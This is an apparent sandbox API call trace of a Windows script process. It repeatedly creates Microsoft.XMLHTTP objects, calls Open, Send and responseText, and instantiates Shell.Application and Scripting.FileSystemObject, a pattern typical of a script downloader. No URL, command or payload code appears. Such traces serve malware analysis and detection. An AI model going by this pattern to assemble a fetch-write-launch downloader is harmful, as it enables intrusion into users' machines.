	[0531.145] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0531.145] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0531.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0531.145] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0531.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.146] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0531.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0531.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.146] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0531.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0532.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0532.444] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0532.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0532.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0532.445] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0532.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0532.445] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0532.445] SysStringLen (param_1=0x0) returned 0x0
	[0532.445] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0532.445] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0532.445] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0532.445] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0532.445] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0532.445] ??2@YAPEAX_K@Z () returned 0x62f350
	[0532.445] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0532.445] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0532.445] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0532.445] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0532.446] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0532.446] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0532.446] SysStringLen (param_1=0x0) returned 0x0
	[0532.446] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0532.448] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0532.448] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0532.448] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0532.448] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0532.448] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0532.449] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0533.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0533.770] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0533.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0533.772] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0533.772] SysStringLen (param_1=0x0) returned 0x0
	[0533.772] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0533.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0533.772] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0533.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0533.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0533.772] ??2@YAPEAX_K@Z () returned 0x62f330
	[0533.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0533.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0533.773] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0533.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0533.773] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0533.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0533.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0533.776] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0533.776] SysStringLen (param_1=0x0) returned 0x0
	[0533.776] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0533.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0533.776] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0533.776] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0533.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0533.776] ??2@YAPEAX_K@Z () returned 0x62f310
	[0533.776] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0533.776] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0533.776] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0533.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0533.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0533.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0533.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0533.777] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0533.777] SysStringLen (param_1=0x0) returned 0x0
	[0533.777] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0533.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0533.777] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0533.777] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0533.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0533.777] ??2@YAPEAX_K@Z () returned 0x62f330
	[0533.777] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f330) 
	[0533.777] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0533.777] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0533.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0533.778] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0533.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0533.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0533.778] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0533.778] SysStringLen (param_1=0x0) returned 0x0
	[0533.778] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0533.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0533.778] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0533.778] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0533.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0533.779] ??2@YAPEAX_K@Z () returned 0x62f310
	[0533.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
